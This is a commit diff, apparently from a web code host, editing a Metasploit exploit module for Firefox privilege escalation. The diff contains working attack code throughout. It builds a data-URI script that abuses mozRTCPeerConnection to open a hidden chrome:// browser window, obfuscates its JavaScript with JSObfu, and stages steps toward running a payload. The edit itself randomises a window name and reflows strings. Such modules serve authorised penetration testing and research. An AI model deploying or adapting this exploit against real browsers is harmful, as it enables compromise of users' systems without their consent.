parent
96276aa6fa
commit
26cfed6c6a
|
@ -73,8 +73,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def generate_html(target_info)
|
||||
key = Rex::Text.rand_text_alpha(5 + rand(12))
|
||||
frame = Rex::Text.rand_text_alpha(5 + rand(12))
|
||||
r = Rex::Text.rand_text_alpha(5 + rand(12))
|
||||
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
|
||||
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function(){},function(){top.vvv=window.open('chrome://browser/content/browser.xul', 'sd32elf', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
|
||||
data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
|
||||
"{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
|
||||
"'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
|
||||
|
||||
js = Rex::Exploitation::JSObfu.new(%Q|
|
||||
var opts = #{JSON.unparse(opts)};
|
||||
|
@ -109,7 +112,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
// (this is important later)
|
||||
function step2() {
|
||||
var clear = setInterval(function(){
|
||||
top.vvv.location ='data:text/html,<html><body><iframe mozBrowser src="about:blank"></iframe></body></html>';
|
||||
top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
|
||||
'src="about:blank"></iframe></body></html>';
|
||||
clearInterval(clear);
|
||||
setTimeout(step3, 100);
|
||||
}, 10);
|
Loading…
Reference in New Issue